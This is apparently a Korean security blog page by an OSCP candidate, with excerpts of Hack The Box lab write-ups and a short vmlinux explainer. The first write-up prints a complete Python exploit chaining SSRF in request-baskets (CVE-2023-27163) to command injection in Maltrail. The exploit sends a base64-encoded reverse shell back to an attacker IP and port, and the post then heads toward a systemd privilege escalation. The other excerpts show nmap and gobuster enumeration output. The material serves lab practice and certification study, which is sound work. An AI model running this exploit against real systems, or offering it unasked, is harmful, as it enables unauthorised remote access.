I’ve spent years managing and developing user-centric services, which led to a strong interest in services’ security and reliability. This interest drew me to System Security and Rust - a language designed for memory safety.
I acquired South Korea’s Engineer Information Security(정보보안기사) national certification. Now, I’m taking a step further into the offensive side by preparing for the OSCP(Offensive Security Certified Professional) certification.
Enumeration Nmap PORT STATE SERVICE │22/tcp open ssh │55555/tcp open unknown Request Basket 55555번 포트로 http 접속을 해 보니 request-basket이라는 서비스가 나왔습니다. Exploitation CVE-2023-27163 #!/usr/bin/env python3 import requests import sys import random import string import base64 import time def ensure_http_schema(url): if not url.startswith(("http://", "https://")): return "http://" + url return url def generate_basket_name(length=6): return ''.join(random.choices(string.ascii_lowercase, k=length)) def create_proxy_basket(server_url, forward_url): if not server_url.endswith("/"): server_url += "/" basket_name = generate_basket_name() api_url = f"{server_url}api/baskets/{basket_name}" payload = { "forward_url": forward_url, "proxy_response": True, "insecure_tls": False, "expand_path": True, "capacity": 250 } print(f"[+] Creating proxy basket '{basket_name}' pointing to {forward_url}") r = requests.post(api_url, json=payload) if r.status_code not in [200, 201]: print(f"[!] Failed to create basket: {r.status_code} {r.text}") sys.exit(1) token = r.json().get("token") basket_url = f"{server_url}{basket_name}" print(f"[+] Basket created: {basket_url}") print(f"[+] Authorization Token: {token}") return basket_url def send_reverse_shell(proxy_url, attacker_ip, attacker_port): print("[+] Encoding reverse shell payload...") payload = f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{attacker_ip}",{attacker_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'""" b64_payload = base64.b64encode(payload.encode()).decode() injected_payload = f'`echo {b64_payload} | base64 -d | bash`' print("[+] Sending command injection via proxy to /login...") response = requests.post(f"{proxy_url}/login", data={"username": f";{injected_payload}"}) if response.status_code in [200, 302]: print("[+] Exploit sent successfully! Check your listener.") else: print(f"[!] Exploit may have failed. HTTP {response.status_code}: {response.text}") if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} <attacker_ip> <attacker_port> <request_baskets_url>") print(f"Example: {sys.argv[0]} 10.10.10.10 8000 http://10.129.229.26:55555") sys.exit(1) attacker_ip = sys.argv[1] attacker_port = int(sys.argv[2]) request_baskets_url = ensure_http_schema(sys.argv[3]) proxy_target_url = "http://127.0.0.1:80" proxy_url = create_proxy_basket(request_baskets_url, proxy_target_url) time.sleep(3) send_reverse_shell(proxy_url, attacker_ip, attacker_port) POC 출처 GitHub - bl4ckarch/ssrf_to_rce_sau: A simple python script that exploits, Service side request forgery on the request-basket 1.2.1 version then Unauith Command injection via Vulnerable parameter SSRF를 통해 80포트 내부 서비스에 페이로드를 전달합니다. 80포트 Maltrail의 RCE 취약점을 통해 리버스 쉘을 획득합니다. Privilege Escalation sudo -l Matching Defaults entries for puma on sau: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User puma may run the following commands on sau: (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service sudo -l 로 루트 권한에서 실행할 수 있는 명령어를 확인해봅니다. /usr/bin/systemctl status를 실행할 수 있었습니다. /usr/bin/systemctl --version systemd 245 (245.4-4ubuntu3.22) systemd의 버전을 확인해보니 245.4였습니다. CVE-2023-26604 💀 Exploit for systemd 246 - Local Privilege Escalation CVE-2023-26604 ...
Enumeration Nmap command sudo nmap -p- target -T4 result Nmap scan report for target (10.129.227.227) Host is up (0.24s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 22, 80 번 포트가 열려있는 것을 확인할 수 있습니다. command sudo nmap -p 22,80 -sC -sV target result Host is up (0.24s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA) | 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA) |_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ...
Enumeration Nmap command sudo nmap -sC -sV target -T4 result Nmap scan report for 10.129.228.217 Host is up (0.27s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA) |_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/ Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel http 포트와 ssh 포트가 열려있는 것을 확인할 수 있습니다. gobuster command gobuster dir -u http://target -w ~/wordlists/dirb/common.txt result Progress: 0 / 1 (0.00%) 2025/10/10 14:04:20 the server returns a status code that matches the provided options for non existing urls. http://target/4a437574-206b-45c5-80a3-853688eb8182 => 302 (redirect to http://searcher.htb/) (Length: 276). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length searcher.htb로 리다이렉트를 시킵니다. 따라서 /etc/hosts파일을 수정하여 타겟 ip와 해당 url을 맵핑합니다. ...
vmlinux 란? 리눅스 커널을 한 번이라도 빌드한 경험이 있다면 vmlinux와 vmlinuz라는 파일을 본 경험이 있을 것입니다. 빌드 경험이 없더라도, 리눅스 루트 파일시스템을 돌아다니다가 /boot 디렉토리 내에 있는 vmlinuz 혹은 bzImage를 보았을 수도 있고요. 이번 글에서는 위 파일들이 무엇이며, 어떤 역할을 하는지 한 번 알아보도록 하겠습니다. vmlinux 우선 리눅스 커널은 다른 프로그램과 마찬가지로 하나의 실행 가능한 프로그램입니다. gcc를 통해 c언어 소스코드 main.c를 빌드했을 때 a.out 이름의 ELF 바이너리가 나오는 것 처럼 커널도 빌드하면 ELF 바이너리가 나오게 됩니다. 그리고 이 바이너리가 vmlinux입니다. ...
About this lab Utilize enumeration, web enumeration, and WordPress enumeration techniques to identify vulnerabilities. Engage in database enumeration and implement privilege escalation strategies. Additionally, harness the abuse of sudo permissions to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation. Enumeration Nmap command sudo nmap -p- T4 target result Host is up (0.098s latency). Not shown: 65523 filtered tcp ports (no-response) PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn 666/tcp open doom 3306/tcp open mysql 12380/tcp open unknown command ...